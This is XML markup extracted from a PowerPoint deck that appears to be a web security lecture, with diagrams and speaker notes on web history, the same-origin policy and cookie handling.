    <dgm:cxn modelId="{CE32B520-7079-462A-B7E6-BAD89B097FCC}" type="presOf" srcId="{63D598EF-1014-4E27-835A-5A5A72CAD361}" destId="{77D5B8FA-1214-487E-BFDB-14C0FB5E3BF1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{8BD1C8BF-82E2-4816-997A-2F3281BD23D3}" srcId="{5D334B64-5DC1-4094-9323-9213B1877035}" destId="{7A980145-927C-48E9-87E3-04C4E3188513}" srcOrd="1" destOrd="0" parTransId="{BC4A52FE-2772-44D1-B351-33F7F43341B5}" sibTransId="{E1045E30-83DB-4CAA-A297-60A982BE0415}"/>
    <dgm:cxn modelId="{1FDC9DBA-3FE2-422E-9E26-B343D7EF249A}" srcId="{5D334B64-5DC1-4094-9323-9213B1877035}" destId="{588210D6-3489-40AE-AF12-13D1C78E23AF}" srcOrd="3" destOrd="0" parTransId="{1546A522-4EA1-4FED-9957-9D82FFA857D4}" sibTransId="{63D598EF-1014-4E27-835A-5A5A72CAD361}"/>
    <dgm:cxn modelId="{1CC97625-AB50-47AD-8362-A972B359385C}" type="presOf" srcId="{E1045E30-83DB-4CAA-A297-60A982BE0415}" destId="{F525B8CA-852F-4373-8FA5-D76D9F3CF8C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{09864E75-4B39-46BC-8913-B925F4535A2A}" type="presOf" srcId="{F5F0BD2A-F4AC-4972-BD13-786F0D1662C6}" destId="{1890BCF0-1D75-4056-A1A7-901633E629AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{1904BB27-7639-4EF4-A918-D35964377F1B}" type="presOf" srcId="{5D334B64-5DC1-4094-9323-9213B1877035}" destId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FDE1E928-CE9D-499E-9AE1-52060884FD36}" type="presOf" srcId="{401A8311-920C-403D-8FAD-85DFE8938118}" destId="{593414DF-6B2E-4079-8C03-D60C9B3C6D8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{0527702B-8698-4A29-8841-C2819A130D43}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{4B4BA7FA-0AE5-42F4-93B0-6D76E7B23C09}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{8A8FD036-5E6C-47DD-94AF-15F1D246B3FF}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{1890BCF0-1D75-4056-A1A7-901633E629AF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FC6D390F-7A8A-4917-9E12-1A28912F5CEB}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{593414DF-6B2E-4079-8C03-D60C9B3C6D8B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FCB7FF61-63D8-4428-9FC2-EF3D60F9A71F}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{99D2D9BC-9EC1-4FC7-84BF-78A45AC64871}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{74E0C5BF-9B5E-4AA2-A5F0-76E7B375C6B5}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{294977C9-6BB4-44FD-988E-6E7E62F0E1C5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A62E57C2-EA4C-41FA-A3B1-199D98A111AF}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{F525B8CA-852F-4373-8FA5-D76D9F3CF8C1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{096424D4-66CD-4B50-9396-AB40FCBCE002}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{37703CA9-0AEB-4D7E-BACE-C7E277BC8DB0}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{9745361A-A975-46A1-870F-1A64679C1F76}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{EDBC8CA4-FBAF-4231-8E16-16B191E000A8}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{7B0D5374-2ECF-464A-AFCE-D6D4D7E51FC2}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{16A9F65A-AB8B-4360-B29A-A7082C6B322F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{C9DDC360-9FF3-4F91-9ECB-DBFDBA35C9CF}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{2BE7E73F-EEF3-4FA6-B199-07691E4F32A4}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{04A343AE-E790-4444-BB77-9CE2279E636A}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{E9F27740-36EB-42B0-A8C6-FA20404D466F}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{C07BC9D0-F370-4B85-92FF-FAE21EFFC99F}" type="presParOf" srcId="{2103F9FF-2D09-49C7-8298-9770C35EE1C2}" destId="{77D5B8FA-1214-487E-BFDB-14C0FB5E3BF1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66358D-25AC-4D7B-B12A-ADFB90F2FD02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-36445" y="140978"/>
          <a:ext cx="6766983" cy="4229364"/>
        </a:xfrm>
        <a:prstGeom prst="swooshArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 25000"/>
            <a:gd name="adj2" fmla="val 25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F71A96-3979-442D-9FE7-FC517511F24C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="822961" y="3060086"/>
          <a:ext cx="175941" cy="175941"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2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FAFD6-6566-4CE6-BDFA-4B6DC9ECDF35}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="682743" y="3289035"/>
          <a:ext cx="2832979" cy="1222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228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1990 Static web</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="682743" y="3289035"/>
        <a:ext cx="2832979" cy="1222286"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{354023D4-ABB1-4CD9-A621-DCA203B334ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2375983" y="1910544"/>
          <a:ext cx="318048" cy="318048"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2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5BA9B9-9694-4061-893A-75591AD45CA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1992753" y="2269218"/>
          <a:ext cx="3406970" cy="1901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527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1995 Dynamic web</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1992753" y="2269218"/>
        <a:ext cx="3406970" cy="1901474"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0C3CB70-39E4-4119-A4C5-4DE11984649A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4243671" y="1211007"/>
          <a:ext cx="439853" cy="439853"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2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4EA1E6-1D10-4D56-A2CB-215075EF5178}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3747843" y="1743732"/>
          <a:ext cx="3055585" cy="1750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069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2000 Web 2.0</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3747843" y="1743732"/>
        <a:ext cx="3055585" cy="17500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0BCF0-1D75-4056-A1A7-901633E629AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1837910" y="44378"/>
          <a:ext cx="698931" cy="698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Bank</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1837910" y="44378"/>
        <a:ext cx="698931" cy="698931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{593414DF-6B2E-4079-8C03-D60C9B3C6D8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="607190" y="411"/>
          <a:ext cx="1973619" cy="1973619"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 6906"/>
            <a:gd name="adj2" fmla="val 465639"/>
            <a:gd name="adj3" fmla="val 548209"/>
            <a:gd name="adj4" fmla="val 20586152"/>
            <a:gd name="adj5" fmla="val 80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4977C9-6BB4-44FD-988E-6E7E62F0E1C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1837910" y="1231131"/>
          <a:ext cx="698931" cy="698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Social Network</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1837910" y="1231131"/>
        <a:ext cx="698931" cy="698931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F525B8CA-852F-4373-8FA5-D76D9F3CF8C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="607190" y="411"/>
          <a:ext cx="1973619" cy="1973619"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 6906"/>
            <a:gd name="adj2" fmla="val 465639"/>
            <a:gd name="adj3" fmla="val 5948209"/>
            <a:gd name="adj4" fmla="val 4386152"/>
            <a:gd name="adj5" fmla="val 80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BC8CA4-FBAF-4231-8E16-16B191E000A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="651158" y="1231131"/>
          <a:ext cx="698931" cy="698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E-mail Service</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="651158" y="1231131"/>
        <a:ext cx="698931" cy="698931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16A9F65A-AB8B-4360-B29A-A7082C6B322F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="607190" y="411"/>
          <a:ext cx="1973619" cy="1973619"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 6906"/>
            <a:gd name="adj2" fmla="val 465639"/>
            <a:gd name="adj3" fmla="val 11348209"/>
            <a:gd name="adj4" fmla="val 9786152"/>
            <a:gd name="adj5" fmla="val 80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F27740-36EB-42B0-A8C6-FA20404D466F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="651158" y="44378"/>
          <a:ext cx="698931" cy="698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Photo Editing</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="651158" y="44378"/>
        <a:ext cx="698931" cy="698931"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77D5B8FA-1214-487E-BFDB-14C0FB5E3BF1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="626571" y="411"/>
          <a:ext cx="1973619" cy="1973619"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 6906"/>
            <a:gd name="adj2" fmla="val 465639"/>
            <a:gd name="adj3" fmla="val 16748209"/>
            <a:gd name="adj4" fmla="val 15186152"/>
            <a:gd name="adj5" fmla="val 80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70949121-145F-4BA0-82E2-550DAD135BCB}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>03/11/15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36650" y="685800"/>
            <a:ext cx="4584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FFAD00A2-EA08-43B5-9062-79D54988E3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33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2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8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4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05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65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26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87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0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First Browser called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WorldWideWeb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First Server called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> running at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Info.cern.ch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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AD00A2-EA08-43B5-9062-79D54988E3F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00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8BBEC-47A2-49D7-91EA-575138DDC154}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58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self allows everything from the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> same origin policy (same scheme, host, and port)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1A2BB-726D-494F-81DF-13E7E330FA4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82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156164-00AA-47DE-9D32-300C657E743A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3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20D3841-FAC6-4312-B9FB-8D6F4DBD30CE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>104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happened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in 1995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radically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dynamism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of web applications? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>What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becomes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popular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in 2000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radically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>way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developing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> web applications?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>What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else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happens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in 2000?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AD00A2-EA08-43B5-9062-79D54988E3F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53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36650" y="685800"/>
            <a:ext cx="45847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556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28C2FA45-AC67-4638-AF3C-314E69B5EEA6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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36650" y="685800"/>
            <a:ext cx="45847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658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2673224-55B2-4CDB-888B-73DA12DE3A35}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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36650" y="685800"/>
            <a:ext cx="45847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79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4E5433C-1874-42BA-9868-1BA46ABB5974}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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8F47B0-7136-4057-8E09-8E7F972932FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48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FF3:   most specific cookie sent first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2B379E-2340-474D-8505-CFAF9E98746F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52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SOP:    same as server-side read/write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CE31A3-47A8-4D62-9E41-435CF5CD1800}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53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RFC 2109 (cookie RFC) has an option for including domain, path in Cookie header, but not supported by browsers.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CBF165-BC4A-4DAE-BA7E-2A43246B6611}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56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1286" y="1517968"/>
            <a:ext cx="8712491" cy="2132885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000" cap="all" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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1285" y="3879251"/>
            <a:ext cx="7105333" cy="193962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6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3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0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274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42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1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47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5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B55D4F-3243-4014-A6A5-2F354E9ED1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61286" y="3761187"/>
            <a:ext cx="8712491" cy="175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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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59094" y="674652"/>
            <a:ext cx="2283857" cy="6493528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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7524" y="674652"/>
            <a:ext cx="6682396" cy="6493528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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817" y="2614278"/>
            <a:ext cx="8627904" cy="2435073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5300" b="0" cap="all"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="x-none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817" y="5120611"/>
            <a:ext cx="8627904" cy="1660277"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="50685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370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05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274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342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411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479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548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B55D4F-3243-4014-A6A5-2F354E9ED1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12038" y="5090252"/>
            <a:ext cx="8712491" cy="175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524" y="1851920"/>
            <a:ext cx="4483126" cy="522180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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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9825" y="1851920"/>
            <a:ext cx="4483126" cy="522180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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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B55D4F-3243-4014-A6A5-2F354E9ED1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524" y="1855294"/>
            <a:ext cx="4364704" cy="708033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200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="506852" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1013704" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1520556" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2027408" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2534260" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3041112" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3547963" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4054815" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none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524" y="2698609"/>
            <a:ext cx="4364704" cy="437294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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Troisième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Quatrième niveau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="x-none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78247" y="1855294"/>
            <a:ext cx="4364704" cy="708033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2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06852" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1013704" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1520556" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2027408" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2534260" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3041112" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3547963" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4054815" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="x-none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78247" y="2698609"/>
            <a:ext cx="4364704" cy="437294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Cliquez pour modifier les styles du texte du masque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" smtClean="0"/>
              <a:t>Deuxième niveau</a:t>
            </a:r>
